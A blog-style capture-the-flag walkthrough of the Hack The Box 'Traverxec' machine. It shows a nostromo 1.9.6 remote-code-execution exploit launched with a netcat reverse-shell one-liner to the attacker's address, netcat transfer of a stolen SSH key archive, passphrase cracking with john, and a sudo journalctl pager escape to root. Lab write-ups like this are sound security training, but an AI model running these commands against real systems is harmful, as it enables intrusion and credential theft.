CTF WriteupsHackthebox Writeups

Hackthebox Traverxec Walkthrough

In this article you well learn the following:

  • Scanning targets using nmap.
  • Enumeration
  • Exploit nostromo 1.9.6
  • Check nostromo configuration file
  • Decrypt ssh private key with john
  • Abuse sudo command for root

Port Scanning

$ nmap -Pn -sC -sV -v 10.10.10.165 -oN traverxec.nmap
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC

Edit vhost:

10.10.10.165 traverxec.htb

I started to enumerate web with gobuster

$ gobuster dir -u http://traverxec.htb/ -w /usr/share/wordlists/dirb/common.txt    
    /css (Status: 301)
    /icons (Status: 301)
    /img (Status: 301)
    /index.html (Status: 200)
    /js (Status: 301)
    /lib (Status: 301)

After enumeration nothing interesting , so i decided to search for exploits for nostromo 1.9.6 and i found an exploit

https://www.rapid7.com/db/modules/exploit/multi/http/nostromo_code_exec

And in exploit-db

https://www.exploit-db.com/exploits/47837

nostromo 1.9.6 – Remote Code Execution

CVE : CVE-2019-1627


I download the exploit and run it

Then i run the exploit again with reverse shell

python 47837.py 10.10.10.165 80 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 9090 >/tmp/f"

The nostromo app in /var/nostromo , and config in /var/nostromo/conf , so i read nhttpd.conf

There’s 3 main things to look on it

	serveradmin		[email protected]
	homedirs		/home
	homedirs_public		public_www

After some digging it’s seems there’s a public folder in /home/david , named public_www , i tried to run ls in that path

$ ls -al /home/david/public_www

And i got a result , there’s protected-file-area directory

there’s a backup ssh comprised file:
backup-ssh-identity-files.tgz

So i moved it to my machine with netcat

nc -lvp 9091 > backup-ssh-identity-files.tgz

nc 10.10.14.5 9091 < /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz

To decompress it

$ gunzip -d backup-ssh-identity-files.tgz
$ tar xvf backup-ssh-identity-files.tar

After checking ssh private key , it’s encrypted

So to decrypt it and got the passphrase we need to run

$ ssh2john id_rsa > david-ssh.key
$ john --wordlist=/root/Desktop/HTB/rockyou.txt david-ssh.key

I got the passphrase , then ssh to user david and got user flag

$ ssh -i id_rsa [email protected]

After few enumeration there’s a /bin directory in david home and it had server-stats.sh , i read it

It seems david has sudo command

/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

To check it , i run the script if it ask for password then it’s not valid sudo command

And it’s run normally , then i tried to search for journalctl, and there’s sudo privilege escalation

https://gtfobins.github.io/gtfobins/journalctl/

After a few tries i found the solution

 -n --lines[=INTEGER]       Number of journal entries to show

If we make the terminal smaller than the length of longest line we can go to the restricted environments , and escape it and get root privilege

This invokes the default pager, which is likely to be less, other functions may apply. It can be used to break out from restricted environments by spawning an interactive system shell

GTFOBins

So i tried it , and it work got root privilage

normal run
make terminal smaller
Got root

Got root flag

That’s all folks , hope you enjoyed this writeup.

Tags

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button
Close